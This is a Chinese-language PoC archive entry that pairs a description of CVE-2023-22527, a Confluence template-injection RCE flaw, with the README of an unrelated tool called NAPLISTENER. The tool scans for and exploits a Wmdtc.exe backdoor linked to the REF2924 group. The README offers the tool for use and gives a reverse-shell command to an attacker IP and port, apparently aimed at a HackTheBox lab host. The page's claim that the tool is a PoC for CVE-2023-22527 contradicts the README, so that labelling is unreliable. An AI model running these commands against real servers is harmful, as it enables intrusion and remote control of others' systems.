关联漏洞
标题:Atlassian Confluence 安全漏洞 (CVE-2023-22527)Description:Atlassian Confluence是澳大利亚Atlassian公司的一套专业的企业知识管理与协同软件,也可以用于构建企业WiKi。 Atlassian Confluence Data Center and Server存在安全漏洞,该漏洞源于存在模板注入漏洞,允许未经身份验证的攻击者在受影响的实例上实现远程代码执行。
Description
PoC for the NAPLISTENER exploit: https://nvd.nist.gov/vuln/detail/CVE-2023-22527 (Purpose: To practice automating exploits)
介绍
# REF2924
NAPLISTENER is a backdoor scanner for the Wmdtc.exe backdoor associated with the REF2924 APT group.
We can use this tool on both Windows and Linux to scan target servers.
If you find the presence of the field [Microsoft HTTPAPI/2.0], within a website's "/" request header, you can try scanning the organization's backdoor.
When running the script for the first time, it will automatically help you download dependent files
# SCAN
`$ python3 wmdtc_backdoor.py -u "https://napper.htb"`
# Reverse Shell
`$ python3 wmdtc_backdoor.py -u "https://napper.htb" -ip_address 10.10.16.15 -port 10032`
[Reference Documentation](https://github.com/ttate10/CVE-2023-22527/files/15300630/Napper.pdf)
文件快照
[4.0K] /data/pocs/d4ded72dc307cc51a4ee2c2d3723df106caad4dd
├── [ 801] README.md
└── [ 12K] wmdtc_backdoor.py
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →